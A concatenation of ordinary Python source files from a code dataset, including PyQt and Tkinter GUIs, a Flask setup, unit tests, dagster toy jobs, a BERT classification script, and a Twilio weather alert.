self.model_path_buttons[widget_id] = new_model_path_button\r\n new_model_path_lineEdit = QLineEdit()\r\n self.model_path_lineEdits[widget_id] = new_model_path_lineEdit\r\n new_save_folder_button = QPushButton('Save Folder')\r\n self.save_folder_buttons[widget_id] = new_save_folder_button\r\n new_save_folder_lineEdit = QLineEdit()\r\n self.save_folder_lineEdits[widget_id] = new_save_folder_lineEdit\r\n new_delete_button = QPushButton('Delete')\r\n self.delete_buttons[widget_id] = new_delete_button\r\n\r\n # set up signals and slots for new widgets\r\n new_model_path_button.clicked.connect(lambda: self.buttonClickedGetModelPath(widget_id))\r\n new_save_folder_button.clicked.connect(lambda: self.buttonClickedGetSaveFolder(widget_id))\r\n new_delete_button.clicked.connect(lambda: self.buttonClickedDeleteModel(widget_id))\r\n\r\n new_model_hbox = QHBoxLayout()\r\n\r\n # set up layout\r\n new_model_hbox.addWidget(new_model_path_button)\r\n new_model_hbox.addWidget(new_model_path_lineEdit)\r\n new_model_hbox.addWidget(new_save_folder_button)\r\n new_model_hbox.addWidget(new_save_folder_lineEdit)\r\n new_model_hbox.addWidget(new_delete_button)\r\n\r\n self.header_vbox.addLayout(new_model_hbox)\r\n\r\n def buttonClickedDeleteModel(self, widget_id):\r\n\r\n number_of_existing_models = len(self.model_path_buttons)\r\n\r\n if number_of_existing_models < 2:\r\n QMessageBox.warning(self, 'Error Message', 'Not enough models, you need to keep at least 1 model.')\r\n return 0\r\n\r\n removed_model_path_button = self.model_path_buttons.pop(widget_id)\r\n removed_model_path_lineEdit = self.model_path_lineEdits.pop(widget_id)\r\n removed_save_path_button = self.save_folder_buttons.pop(widget_id)\r\n removed_save_path_lineEdit = self.save_folder_lineEdits.pop(widget_id)\r\n removed_delete_button = self.delete_buttons.pop(widget_id)\r\n\r\n self.widget_id_save_list.remove(widget_id)\r\n \r\n self.header_vbox.removeWidget(removed_model_path_button)\r\n self.header_vbox.removeWidget(removed_model_path_lineEdit)\r\n self.header_vbox.removeWidget(removed_save_path_button)\r\n self.header_vbox.removeWidget(removed_save_path_lineEdit)\r\n self.header_vbox.removeWidget(removed_delete_button)\r\n\r\n removed_model_path_button.hide()\r\n removed_model_path_lineEdit.hide()\r\n removed_save_path_button.hide()\r\n removed_save_path_lineEdit.hide()\r\n removed_delete_button.hide()\r\n\r\n def switchFromIntialToInfering(self):\r\n self.status = Status.infering\r\n self.enabledAllButtons(False)\r\n\r\n def switchFromInferingToInfered(self):\r\n self.status = Status.infered\r\n self.enabledAllButtons(True)\r\n\r\n def switchFromInferedToInfering(self):\r\n self.status = Status.infering\r\n self.enabledAllButtons(False)\r\n self.infer_progress_window.hide()\r\n self.window_vbox.removeWidget(self.infer_progress_window)\r\n\r\n def enabledAllButtons(self,enabled):\r\n self.source_image_folder_button.setEnabled(enabled)\r\n self.depth_image_folder_button.setEnabled(enabled)\r\n self.model_config_button.setEnabled(enabled)\r\n self.infer_script_path_button.setEnabled(enabled)\r\n for model_path_button in self.model_path_buttons.values():\r\n model_path_button.setEnabled(enabled)\r\n for save_floder_button in self.save_folder_buttons.values():\r\n save_floder_button.setEnabled(enabled)\r\n for delete_button in self.delete_buttons.values():\r\n delete_button.setEnabled(enabled)\r\n self.add_model_button.setEnabled(enabled)\r\n self.infer_button.setEnabled(enabled)\r\n self.color_type_combobox.setEnabled(enabled)\r\n 
self.python_version_combobox.setEnabled(enabled)\r\n\r\n def buttonClickedInfer(self):\r\n\r\n class inferProgressWindow(progressWindow):\r\n\r\n def __init__(self):\r\n\r\n super().__init__()\r\n\r\n # add compare button to hbox\r\n self.body_button_hbox = QHBoxLayout()\r\n self.compare_button = QPushButton('Compare')\r\n self.body_button_hbox.addStretch(1)\r\n self.body_button_hbox.addWidget(self.compare_button)\r\n self.body_vbox.addLayout(self.body_button_hbox)\r\n\r\n\r\n\r\n if any(len(os.listdir(save_folder_lineEdit.text())) > 0 for save_folder_lineEdit in self.save_folder_lineEdits.values()):\r\n QMessageBox.warning(self, 'Error Message', 'Each save folder must be empty, please check if there is anything in the folder.')\r\n return\r\n\r\n if self.status is Status.initial:\r\n self.switchFromIntialToInfering()\r\n elif self.status is Status.infered:\r\n ret = QMessageBox.question(self, \"Re-Infer Dialog\", \"Are you sure you want to Re-Infer?\")\r\n if ret == QMessageBox.Yes:\r\n self.switchFromInferedToInfering()\r\n else:\r\n return\r\n\r\n # add progress window\r\n self.infer_progress_window = inferProgressWindow()\r\n self.infer_progress_window.addMultipleProgress(len(self.model_path_buttons))\r\n self.infer_progress_window.compare_button.clicked.connect(self.buttonClickedCompare)\r\n self.window_vbox.addWidget(self.infer_progress_window)\r\n\r\n for which_model, widget_id in enumerate(self.model_path_buttons):\r\n time_stamp = int(time.time()*10e6)\r\n config_file_name = 'config_' + str(time_stamp) + '.yml'\r\n current_directory = os.getcwd()\r\n if not os.path.isdir('configs'):\r\n os.mkdir('configs')\r\n config_file_path = os.path.join(current_directory, 'configs', config_file_name)\r\n\r\n error = None\r\n config_file = None\r\n try:\r\n config_file = QFile(config_file_path)\r\n if not config_file.open(QIODevice.WriteOnly):\r\n raise IOError(str(config_file.errorString()))\r\n config_stream = QTextStream(config_file)\r\n config_stream.setCodec('UTF-8')\r\n config_stream << 'infer_settings:\\n'\r\n config_stream << ' save_dir: ' << self.save_folder_lineEdits[widget_id].text() << '\\n'\r\n config_stream << ' restore_from: ' << self.model_path_lineEdits[widget_id].text() << '\\n'\r\n config_stream << ' data_dir: ' << self.source_image_folder_lineEdit.text() << '\\n'\r\n config_stream << ' depth_dir: ' << self.depth_image_folder_lineEdit.text() << '\\n'\r\n config_stream << ' model_config: ' << self.model_config_lineEdit.text() << '\\n'\r\n config_stream << ' #color_type candidates: \\'instance\\',\\'class\\' ' << '\\n'\r\n config_stream << ' color_type: ' << self.color_type_combobox.currentText() << '\\n'\r\n\r\n print(\"Saved config file as {0}\".format(config_file_path))\r\n except EnvironmentError as e:\r\n error = \"Failed to save {0} because of {1}\".format(config_file_name, e)\r\n finally:\r\n if config_file is not None:\r\n config_file.close()\r\n if error is not None:\r\n print(error)\r\n\r\n # start inference subprocess\r\n python_version = str(self.python_version_combobox.currentText())\r\n subprocess_args = python_version + ' ' + self.infer_script_path_lineEdit.text() + ' ' + config_file_path\r\n\r\n p = subprocess.Popen(subprocess_args, shell=True)\r\n number_of_source_images = len(os.listdir(self.source_image_folder_lineEdit.text()))\r\n\r\n while p.poll() is None:\r\n number_of_saved_images = len(os.listdir(self.save_folder_lineEdits[widget_id].text()))\r\n 
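# Progress is estimated by counting files in the save folder; the infer subprocess is assumed to write one result image per source image.\r\n                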
self.infer_progress_window.progress_bars[which_model].setValue(int(number_of_saved_images / number_of_source_images * 100))  # QProgressBar.setValue expects an int\r\n                QApplication.processEvents()\r\n\r\n        QMessageBox.information(self, 'Success Message', 'The infer process has successfully finished!')\r\n        self.switchFromInferingToInfered()\r\n\r\n\r\n    def buttonClickedCompare(self):\r\n        self.infer_result_comparer = Comparer(len(self.model_path_lineEdits))\r\n        for inferer_widget_id in self.model_path_lineEdits:\r\n            self.infer_result_comparer.multi_select_dialog.add_one_dir(self.save_folder_lineEdits[inferer_widget_id].text())\r\n\r\n\r\ndef main():\r\n    app = QApplication(sys.argv)\r\n    ex = Inferer()\r\n    sys.exit(app.exec_())\r\n\r\nif __name__ == '__main__':\r\n    main()\r\n","sub_path":"dataset_tools/src/Image_comparer/InfererMaskRCNN.py","file_name":"InfererMaskRCNN.py","file_ext":"py","file_size_in_byte":15968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"81958863","text":"from flask import Flask, g\nfrom flask.ext.mongoengine import MongoEngine\nfrom flask.ext.login import LoginManager, current_user\n\nfrom jinja2 import FileSystemLoader\n\nfrom yota.renderers import JinjaRenderer\nfrom yota import Form\n\nfrom weekly import data\n\nimport babel.dates as dates\nimport os\n\nroot = os.path.abspath(os.path.dirname(__file__) + '/../')\n\n# initialize our flask application\napp = Flask(__name__, static_folder='../static', static_url_path='/static')\n\n# Setup login stuff\nlm = LoginManager()\nlm.init_app(app)\nlm.login_view = 'login'\n\n# set our template path\napp.jinja_loader = FileSystemLoader(os.path.join(root, 'templates'))\n# setup mongo connection information\napp.config[\"MONGODB_SETTINGS\"] = {'DB': \"weekly\"}\napp.config[\"SECRET_KEY\"] = \"KeepThisS3cr3t\"\ndb = MongoEngine(app)\n\n\n# patch yota to use bootstrap3\nJinjaRenderer.templ_type = 'bs3'\nJinjaRenderer.search_path.insert(0, root + \"/templates/yota/\")\nForm.type_class_map = {'error': 'alert alert-danger',\n                       'info': 'alert alert-info',\n                       'success': 'alert alert-success',\n                       'warn': 'alert alert-warning'}\n\n# General configuration\n# ======================\n\n# Add a date format filter to jinja templating\n@app.template_filter('datetime')\ndef format_datetime(value, format='medium'):\n    if format == 'full':\n        format=\"EEEE, d. MMMM y 'at' HH:mm\"\n    elif format == 'medium':\n        format=\"EE dd.MM.y HH:mm\"\n    return dates.format_datetime(value, format)\n\n@app.template_filter('date')\ndef format_date(value, format='medium'):\n    if format == 'full':\n        format=\"EEEE, d. 
MMMM y\"\n elif format == 'medium':\n format=\"EE dd.MM.y\"\n return dates.format_datetime(value, format)\n\n# Make user availible easily in the global var\n@app.before_request\ndef before_request():\n g.user = current_user\n\n# tell the session manager how to access the user object\n@lm.user_loader\ndef user_loader(id):\n return User.objects.get(id=id)\n\nfrom weekly import views, models\n\n# check to make sure our desired majors are in the database\nfor major, key in data.majors:\n models.Major.objects.get_or_create(key=key, text=major)\n# check to make sure our desired majors are in the database\nfor team in data.teams:\n models.Team.objects.get_or_create(text=team)\n","sub_path":"weekly/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"497263775","text":"import unittest\nfrom .choice import Choice\n\n\nclass TestChoice(Choice):\n FIRST = 1, \"zed\"\n SECOND = 2\n THIRD = 3\n FOURTH = 4, \"a description\"\n WITH_UNDERSCORE = 5\n MORE_VALUES = 6, \"another description\"\n\n\nclass TestChoiceInheritance(TestChoice):\n EXTRA_VALUE = 7\n pass\n\n\nclass TestChoiceOrdered(TestChoice):\n ZED = 7, \"zzzzzzzzz\"\n _order_by = \"name\"\n\n\nclass TestCustomOrdering(Choice):\n LAST = ('last', 'Last', 10)\n FIRST = ('first', 'First', 1)\n\n @staticmethod\n def _get_sort_key(value):\n return value[2]\n\n\nclass TestCustomOrderingInheritance(TestCustomOrdering):\n MIDDLE = ('middle', 'Middle', 5)\n\n\nclass TestSimple(Choice):\n OTHER = 10\n\n\nclass TestMultipleInheritance(TestChoice, TestSimple):\n pass\n\n\ndef get_name_from_choices(value, choices):\n for id, name in choices:\n if id == value:\n return name\n\n\nclass TestChoices(unittest.TestCase):\n def testInstance(self):\n self.failUnlessEqual(list(TestChoice()), list(TestChoice))\n self.failUnlessEqual(list(TestChoiceOrdered()), list(TestChoiceOrdered))\n self.failUnlessEqual(list(TestChoiceInheritance()), list(TestChoiceInheritance))\n\n def testInheritance(self):\n self.failUnlessEqual(list(TestChoiceInheritance)[:-1], list(TestChoice))\n\n def testNames(self):\n fourth_name = get_name_from_choices(TestChoice.FOURTH, list(TestChoice))\n self.failUnlessEqual(fourth_name, \"a description\")\n\n underscore_name = get_name_from_choices(TestChoice.WITH_UNDERSCORE, list(TestChoice))\n self.failUnlessEqual(underscore_name, \"With Underscore\")\n\n self.failUnlessEqual(TestChoice.GetByName(\"a description\"), TestChoice.FOURTH)\n self.failUnlessEqual(TestChoice.GetByValue(TestChoice.FOURTH), fourth_name)\n\n def testOrderBy(self):\n self.failIfEqual(list(TestChoice), list(TestChoiceOrdered))\n self.failUnless(list(TestChoiceOrdered)[-1][0] == TestChoiceOrdered.ZED)\n self.failUnlessEqual(list(TestChoice)[0][0], TestChoice.FIRST)\n\n def testCustomOrdering(self):\n self.assertEqual(list(TestCustomOrdering)[0][0], TestCustomOrdering.FIRST)\n self.assertEqual(list(TestCustomOrdering)[-1][0], TestCustomOrdering.LAST)\n self.assertEqual(list(TestCustomOrderingInheritance)[0][0], TestCustomOrdering.FIRST)\n self.assertEqual(list(TestCustomOrderingInheritance)[-1][0], TestCustomOrdering.LAST)\n\n def testMultipleInheritance(self):\n self.assertEqual(list(TestMultipleInheritance), list(TestChoice) + list(TestSimple))\n\n\nif __name__ == \"__main__\":\n 
unittest.main()\n","sub_path":"django_choice_object/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"321577999","text":"from pytube import YouTube\nfrom tkinter.filedialog import *\nfrom tkinter.messagebox import *\nfrom tkinter import *\nfrom threading import *\nfont = ('verdana', 20)\nfile_size = 0\ndef completeDownload(stream=None, file_path=None):\n    print(\"download completed\")\n    showinfo(\"Message\", \"File has been downloaded...\")\n    db['text'] = \"Download Video\"\n    db['state'] = \"active\"\n    urlfield.delete(0, END)\ndef progressDownload(stream=None, chunk=None, bytes_remaining=None):\n    per = 100 * (file_size - bytes_remaining) / file_size\n    db['text'] = \"{:00.0f}% downloaded\".format(per)\ndef btnclick():\n    try:\n        db['text'] = 'Please Wait....'\n        db['state'] = 'disabled'  # 'disable' is not a valid Tk state and raises TclError\n        url = urlfield.get()\n        if url == '':\n            return\n        print(url)\n        thread = Thread(target=down, args=(url,))\n\n        thread.start()\n    except Exception as e:\n        print(e)\ndef down(url):\n    global file_size\n    path = askdirectory()\n    if not path:  # askdirectory() returns '' when the dialog is cancelled\n        return\n    try:\n        yt = YouTube(url)\n        st = yt.streams.first()\n        yt.register_on_complete_callback(completeDownload)\n        yt.register_on_progress_callback(progressDownload)\n        file_size = st.filesize\n        st.download(output_path=path)\n        showinfo(\"Message\", \"File has been downloaded...\")\n    except Exception as e:\n        print(e)\nroot = Tk()\nroot.title(\"Sneha's Youtube Downloader\")\nroot.geometry(\"500x600\")\nphoto = PhotoImage(file = \"yotube.png\")\nheadingIcon = Label(root, image = photo)\nheadingIcon.pack(side = TOP ,pady = 3)\nurlfield = Entry(root,font= font,justify = CENTER)\nurlfield.pack(side = TOP,fill = X,padx = 10)\nurlfield.focus()\ndb = Button(root,text = \"start download\", font= font,relief = 'ridge', command = btnclick)\ndb.pack(side = TOP, pady = 20)\n\nroot.mainloop()\n","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"432214173","text":"from typing import AbstractSet, Any, Optional\n\nfrom dagster import (\n    InputDefinition,\n    ResourceDefinition,\n    SolidDefinition,\n    repository,\n    schedule,\n    sensor,\n    solid,\n)\nfrom dagster.core.definitions.decorators.graph import graph\n\n\ndef make_solid(\n    name: str,\n    required_resource_keys: Optional[AbstractSet[str]] = None,\n    config_schema: Optional[Any] = None,\n    num_inputs: int = 0,\n) -> SolidDefinition:\n    @solid(\n        name=name,\n        input_defs=[InputDefinition(f\"input{i}\") for i in range(num_inputs)],\n        required_resource_keys=required_resource_keys,\n        config_schema=config_schema,\n    )\n    def _solid(_, **_kwargs):\n        return None\n\n    return _solid\n\n\n@graph\ndef event_tables():\n    \"\"\"A graph with no resources\"\"\"\n    make_raw_events = make_solid(\"make_raw_events\")\n    clean_events = make_solid(\"clean_events\", num_inputs=1)\n\n    raw_events = make_raw_events()\n    clean_events(raw_events)\n\n\n@schedule(job=event_tables, cron_schedule=\"0 0 * * *\")\ndef event_tables_schedule(_):\n    return {}\n\n\n@graph\ndef event_reports():\n    make_event_reports = make_solid(\"make_event_reports\", required_resource_keys={\"mode\"})\n    make_event_reports()\n\n\n@sensor(job=event_reports.to_job(resource_defs={\"mode\": ResourceDefinition.none_resource()}))\ndef event_reports_sensor():\n    pass\n\n\nevent_reports_dev = event_reports.to_job(resource_defs={\"mode\": 
ResourceDefinition.none_resource()})\n\n\n@graph\ndef crm_ingest():\n \"\"\"A graph with multiple production jobs\"\"\"\n ingest_users = make_solid(\"ingest_users\", required_resource_keys={\"crm\"})\n ingest_interactions = make_solid(\"ingest_interactions\", required_resource_keys={\"crm\"})\n\n ingest_users()\n ingest_interactions()\n\n\ncrm_ingest_dev = crm_ingest.to_job(resource_defs={\"crm\": ResourceDefinition.none_resource()})\n\n\n@schedule(\n job=crm_ingest.to_job(\n name=\"crm_ingest_instance1\", resource_defs={\"crm\": ResourceDefinition.none_resource()}\n ),\n cron_schedule=\"0 0 * * *\",\n)\ndef crm_ingest_instance1_schedule(_):\n return {}\n\n\n@schedule(\n job=crm_ingest.to_job(\n name=\"crm_ingest_instance2\", resource_defs={\"crm\": ResourceDefinition.none_resource()}\n ),\n cron_schedule=\"0 0 * * *\",\n)\ndef crm_ingest_instance2_schedule(_):\n return {}\n\n\n@graph\ndef content_recommender_training():\n \"\"\"A graph with a production job, but no schedule\"\"\"\n build_user_features = make_solid(\"build_user_features\")\n build_item_features = make_solid(\"build_item_features\")\n train_model = make_solid(\"train_model\", required_resource_keys={\"mlflow\"}, num_inputs=2)\n evaluate_model = make_solid(\"evaluate_model\", num_inputs=1)\n\n evaluate_model(train_model(input0=build_user_features(), input1=build_item_features()))\n\n\ncontent_recommender_training_dev = content_recommender_training.to_job(\n resource_defs={\"mlflow\": ResourceDefinition.none_resource()}\n)\n\ncontent_recommender_training_prod = content_recommender_training.to_job(\n resource_defs={\"mlflow\": ResourceDefinition.none_resource()}\n)\n\n\n@graph\ndef process_customer_data_dump():\n \"\"\"Customer success managers run this pipeline for a particular customers when those customers\n have data to upload.\"\"\"\n process_customer = make_solid(\"process_customer\", config_schema={\"customer_id\": str})\n process_customer()\n\n\nprocess_customer_data_dump_dev = process_customer_data_dump.to_job(\n config={\"solids\": {\"process_customer\": {\"config\": {\"customer_id\": \"test_customer\"}}}}\n)\n\n\n@repository\ndef graph_job_dev_repo():\n return [\n event_tables,\n event_reports_dev,\n crm_ingest_dev,\n content_recommender_training_dev,\n process_customer_data_dump_dev,\n ]\n\n\n@repository\ndef graph_job_prod_repo():\n return [\n event_tables_schedule,\n event_reports_sensor,\n crm_ingest_instance1_schedule,\n crm_ingest_instance2_schedule,\n content_recommender_training_prod,\n process_customer_data_dump,\n ]\n","sub_path":"python_modules/dagster-test/dagster_test/toys/graph_job_repos.py","file_name":"graph_job_repos.py","file_ext":"py","file_size_in_byte":3967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"27667384","text":"import requests\nimport os\nfrom twilio.rest import Client\n\naccount_sid = os.environ.get(\"TWILIO_SID\")\nauth_token = os.environ.get(\"TWILIO_TOKEN\")\nclient = Client(account_sid, auth_token)\ntwilio_number = os.environ.get(\"TWILIO_NUMBER\")\nmy_number = os.environ.get(\"MY_NUMBER\")\n\nLATITUDE = -22.338930\nLONGITUDE = -49.055190\n\napi_key = os.environ.get(\"OWM_API_KEY\")\napi_url = \"https://api.openweathermap.org/data/2.5/onecall\"\nparams = {\n \"lat\": LATITUDE,\n \"lon\": LONGITUDE,\n \"exclude\": \"current,minutely,daily,alerts\",\n \"appid\": api_key\n}\n\nresponse = requests.get(api_url, params=params)\nresponse.raise_for_status()\n\ndata = response.json()\n\nfor hourly_data in data[\"hourly\"][:12]:\n 
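# OpenWeatherMap condition ids below 700 are the precipitation groups\n # (2xx thunderstorm, 3xx drizzle, 5xx rain, 6xx snow); 7xx is atmosphere\n # and 800+ is clear/clouds, so any id < 700 here is treated as rain.\n 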
condition_code = hourly_data[\"weather\"][0][\"id\"]\n if condition_code < 700:\n message = client.messages.create(\n body=\"It's gonna rain! Don't forget to bring an ☔\",\n from_=twilio_number,\n to=my_number\n )\n break\n","sub_path":"Day035/Lectures/lec04.py","file_name":"lec04.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"555083870","text":"import torch\nimport tensorflow as tf\nfrom transformers import BertTokenizer, BertForMultipleChoice\nimport pandas as pd\nimport nltk\n\n\nchoice_list = pd.read_csv('./data/sorted_cats.csv', header=None)[0].sample(6).to_list()\nprint(choice_list)\ncate_dic = {k: v for k, v in enumerate(choice_list)}\nprint(cate_dic)\n\nprint(len(choice_list))\ntesting_data = pd.read_csv('./data/new_cat_list_3match_results.csv', usecols=[2,3,6]).sample(7)\nprint(testing_data)\nprint(len(testing_data))\n\ntext_list = testing_data['Abstract'].to_list()\n\nmodel_name = 'emilyalsentzer/Bio_ClinicalBERT'\ntokenizer = BertTokenizer.from_pretrained(model_name)\nmodel = BertForMultipleChoice.from_pretrained(model_name)\n\ndef get_prompt_list(prompt):\n prompt_list = []\n for i in range(len(choice_list)):\n prompt_list.append(prompt)\n return prompt_list\n\ndef num2cat_dic(indices_list):\n map_cat = []\n for ind in indices_list:\n cat_value = cate_dic[ind]\n map_cat.append(cat_value)\n\n return map_cat\n\n\n\n\nprint('============== start getting results =================')\nprediction_list = []\nfor prompt in text_list:\n print('prompt')\n print(prompt)\n\n prompt_list = get_prompt_list(prompt)\n encoding = tokenizer(prompt_list, choice_list, return_tensors='pt', padding=True)\n outputs = model(**{k: v.unsqueeze(0) for k, v in encoding.items()}) # batch size is 1, , labels=labels\n\n # labels = torch.tensor(0).unsqueeze(0)\n\n assert len(prompt_list)==len(choice_list)\n\n print('encoding')\n print(encoding)\n outputs = model(**{k: v.unsqueeze(0) for k, v in encoding.items()}) # batch size is 1, , labels=labels\n\n # the linear classifier still needs to be trained\n #loss = outputs[0]\n logits = outputs[0] # shape (1, sorted_cates)\n np_logits = logits.detach().numpy()\n tf_logits = tf.convert_to_tensor(np_logits)\n\n values, indices = tf.nn.top_k(tf_logits, 5)\n\n indices = indices.numpy().flatten() #numpy.ndarray\n cate = num2cat_dic(indices)\n prediction_list.append(cate)\n\ntesting_data['prediction'] = prediction_list\n\n\n\ntesting_data.to_csv('./data/testing_results.csv')\n\n","sub_path":"testing_run.py","file_name":"testing_run.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"389201141","text":"import math\n\n\nclass UpdatesScheduler:\n def __init__(self):\n self.counter = 0\n\n def schedule(self, max_game_duration, action_duration, mode, max_games, update_cycles, update_interval, config):\n update_list = [22000, 1000, 1000, 1000, 1000, 1000, 1000]\n total_update_cycles = config['Experiment'][mode]['total_update_cycles']\n online_updates = 0\n if config['Experiment']['online_updates']:\n online_updates = max_game_duration / action_duration * (\n max_games - config['Experiment'][mode]['start_training_step_on_game'])\n\n if update_cycles is None:\n update_cycles = total_update_cycles - online_updates\n\n if config['Experiment']['scheduling'] == \"descending\":\n self.counter += 1\n if not (math.ceil(max_games / update_interval) == self.counter):\n update_cycles /= 2\n\n 
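# \"big_first\" spends the budget from the hard-coded update_list: without\n # online updates each call consumes the next entry (22000 first, then\n # 1000s); with online updates only the call with counter == 1 updates.\n 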
elif config['Experiment']['scheduling'] == \"big_first\":\n if config['Experiment']['online_updates']:\n if self.counter == 1:\n update_cycles = update_list[self.counter]\n else:\n update_cycles = 0\n else:\n update_cycles = update_list[self.counter]\n\n self.counter += 1\n\n else:\n update_cycles = (total_update_cycles - online_updates) / math.ceil(\n max_games / update_interval)\n\n return math.ceil(update_cycles)\n","sub_path":"game/updates_scheduler.py","file_name":"updates_scheduler.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"475405310","text":"import sys\r\nfrom PyQt5.QtWidgets import QWidget , QPushButton , QApplication , QLineEdit , QLabel , QPlainTextEdit , QMessageBox , QGridLayout , QListWidget\r\nfrom PyQt5.QtGui import QIcon , QFont\r\nimport smtplib\r\nfrom email.mime.multipart import MIMEMultipart\r\nfrom email.mime.text import MIMEText\r\nimport sqlite3\r\nimport datetime\r\n\r\n\r\nclass Show_window(QWidget):\r\n def __init__( self ):\r\n QWidget.__init__( self )\r\n\r\n def init_ui( self,some_text):\r\n self.setWindowTitle( 'База отправленных сообщений' )\r\n self.setFixedSize( 900 , 900 )\r\n self.move( 900 , 100 )\r\n self.setStyleSheet( 'background-color: rgb(24, 48, 73);color: honeydew;' )\r\n self.setWindowIcon( QIcon( 'startup_rocket_spaceship_launch_business_icon_191142 (1).png' ) )\r\n self.text_for_lineedit = QLabel( self )\r\n self.text_for_lineedit.move( 5 , 10 )\r\n self.some_text = some_text\r\n print(self.some_text)\r\n self.text_for_lineedit.setText(self.some_text)\r\n self.text_for_lineedit.setStyleSheet('background-color: rgb(255,255,255);color:black;margin-left:25px;font-size:25px;')\r\n\r\n def set_name( self ,some_text ):\r\n self.some_text = some_text\r\n print(self.some_text)\r\n\r\n\r\nclass Data_window( QWidget ):\r\n def __init__( self ):\r\n QWidget.__init__( self )\r\n self.init_ui()\r\n\r\n def init_ui( self ):\r\n # -----------------------\r\n self.conn = sqlite3.connect( 'orders.db' )\r\n self.cur = self.conn.cursor()\r\n self.setWindowTitle( 'База отправленных сообщений' )\r\n self.setFixedSize( 500 , 500 )\r\n self.move( 900 , 100 )\r\n self.setStyleSheet( 'background-color: rgb(24, 48, 73);color: honeydew;' )\r\n self.setWindowIcon( QIcon( 'startup_rocket_spaceship_launch_business_icon_191142 (1).png' ) )\r\n # -----------------------\r\n self.cur.execute( \"SELECT to_email FROM sended_emails;\" )\r\n self.emails_data = self.cur.fetchall()\r\n self.cur.execute( \"SELECT message FROM sended_emails;\")\r\n self.messages_for_emails = self.cur.fetchall()\r\n self.cur.execute(\"SELECT text_data_and_time FROM sended_emails;\")\r\n self.times = self.cur.fetchall()\r\n # -----------------------\r\n layout = QGridLayout()\r\n self.setLayout( layout )\r\n self.listwidget = QListWidget()\r\n count = 0\r\n for i in zip(self.emails_data,self.times):\r\n for j in i :\r\n print(j[0])\r\n check = ''\r\n for emails in zip(self.emails_data,self.times):\r\n for items in emails:\r\n check += items[0] + ' '\r\n self.listwidget.insertItem(count ,check )\r\n check = ''\r\n count+= 1\r\n self.listwidget.clicked.connect(self.on_click_db)\r\n layout.addWidget( self.listwidget )\r\n self.text_base = []\r\n for i in self.messages_for_emails:\r\n self.text_base.append(i[0])\r\n print(self.text_base)\r\n def on_click_db( self ):\r\n item = self.listwidget.currentIndex()\r\n print(self.text_base[item.row()])\r\n self.window_3 = Show_window()\r\n 
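# open a detail window with the stored message body for the clicked row\r\n 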
self.window_3.init_ui(self.text_base[item.row()])\r\n self.window_3.show()\r\n\r\nclass App( QWidget ):\r\n def __init__( self ):\r\n super( QWidget , self ).__init__()\r\n self.app = QApplication( sys.argv )\r\n self.init_ui()\r\n\r\n def init_ui( self ):\r\n # -----------------------\r\n self.window_2 = Data_window()\r\n # -----------------------\r\n self.conn = sqlite3.connect( 'orders.db' )\r\n self.cur = self.conn.cursor()\r\n self.cur.execute( \"\"\"CREATE TABLE IF NOT EXISTS sended_emails(\r\n to_email TEXT,\r\n message TEXT,\r\n text_data_and_time TEXT);\r\n \"\"\" )\r\n self.conn.commit()\r\n # -----------------------\r\n self.setFixedSize( 400 , 800 )\r\n self.move( 500 , 100 )\r\n self.setStyleSheet( 'background-color: rgb(24, 48, 73);color: honeydew;' )\r\n # -----------------------\r\n self.text_for_lineedit = QLabel( self )\r\n self.text_for_lineedit.move( 5 , 10 )\r\n self.text_for_lineedit.setText( 'Введите Email : ' )\r\n self.text_for_lineedit.setStyleSheet( \"\" )\r\n self.text_for_lineedit.setFont( QFont( 'Bitter' , 10 ) )\r\n # -----------------------\r\n self.textbox = QLineEdit( self )\r\n self.textbox.move( 5 , 40 )\r\n self.textbox.resize( 390 , 40 )\r\n self.textbox.setStyleSheet( 'background-color: rgb(184, 205, 228);'\r\n 'color: rgb(37, 16, 37);'\r\n 'font-size: 22px;' )\r\n # -----------------------\r\n self.plain_text = QPlainTextEdit( self )\r\n self.plain_text.insertPlainText( 'Введите сюда своё сообщение (╯°□°)╯︵ ┻━┻' )\r\n self.plain_text.resize( 390 , 500 )\r\n self.plain_text.move( 5 , 100 )\r\n self.holder_for_text = [ ]\r\n self.plain_text.textChanged.connect(\r\n lambda: self.holder_for_text.append( self.plain_text.document().toPlainText() ) )\r\n self.plain_text.setStyleSheet( 'background-color: rgb(184, 205, 228);'\r\n 'color: rgb(37, 16, 37);'\r\n 'font-size: 22px;' )\r\n # -----------------------\r\n self.push_button_submit = QPushButton( \"Отправить сообщение\" , self )\r\n self.push_button_submit.resize( 390 , 55 )\r\n self.push_button_submit.move( 0 , 740 )\r\n self.push_button_submit.setStyleSheet( \"background-color: rgb(155, 155, 155);\"\r\n \"color:black;\"\r\n \"text-align: center;\"\r\n \"border: 1px solid rgb(0, 0, 0);margin-left:5px;\" )\r\n self.push_button_submit.clicked.connect( self.on_click_send )\r\n # -----------------------\r\n self.button_to_db = QPushButton( 'Перейти в базу данных' , self )\r\n self.button_to_db.resize( 390 , 55 )\r\n self.button_to_db.move( 0 , 640 )\r\n self.button_to_db.setStyleSheet( \"background-color: rgb(155, 155, 155);\"\r\n \"color:black;\"\r\n \"text-align: center;\"\r\n \"border: 1px solid rgb(0, 0, 0); margin-left:5px;\" )\r\n\r\n self.button_to_db.clicked.connect( self.change_to_db_window )\r\n # -----------------------\r\n self.setWindowTitle( 'Отправка сообщений' )\r\n self.setWindowIcon( QIcon( 'startup_rocket_spaceship_launch_business_icon_191142 (1).png' ) )\r\n self.show()\r\n\r\n def on_click_send( self ):\r\n print( \"pustota\" )\r\n if self.textbox.text() is None or self.holder_for_text[ -1 ] is None or self.textbox.text() == '':\r\n print( \"Пустые поля\" )\r\n else:\r\n self.push_button_submit.setStyleSheet( \"background-color: 